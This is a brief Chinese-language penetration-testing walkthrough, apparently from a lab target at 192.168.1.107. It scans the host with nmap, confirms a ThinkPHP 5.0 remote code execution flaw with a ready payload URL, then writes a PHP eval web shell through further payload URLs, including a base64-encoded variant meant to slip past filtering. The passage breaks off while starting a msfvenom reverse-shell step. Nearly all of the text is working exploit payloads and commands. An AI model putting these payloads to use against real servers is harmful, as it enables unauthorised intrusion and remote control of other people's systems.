是样一个逻辑
nmap信息收集:
nmap -T4 -O 192.168.1.107
http://192.168.1.107/public/
看到这个版本就会想起:ThinkPHP-V5.0-RCE-远程代码执行漏洞
payload:
http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
执行成功说明存在此漏洞
写入shell
http://192.168.1.107/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%E2%80%9C%3C?php%20@eval($_POST[%E2%80%98TeamsSix%E2%80%99]);?%3E%E2%80%9D%20%3E%20shell.php
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST['123456'])?>' > shell.php
看看是否写入:
http://192.168.1.107/public/shell.php
上菜刀连接:
如果有拦截改成base64
[scode type="yellow"]如果连接失败可能是存在过滤,可用base64进行编码
然后语句改为:echo "PD9waHAgQGV2YWwoJF9QT1NUWycxMjM0NTYnXSk/Pg==" | base64 -d > test1.php 即可
看下靶机一系统信息
uanme -a
然后使用msfvenom生成对应的反向shellcode:
msfvenom -p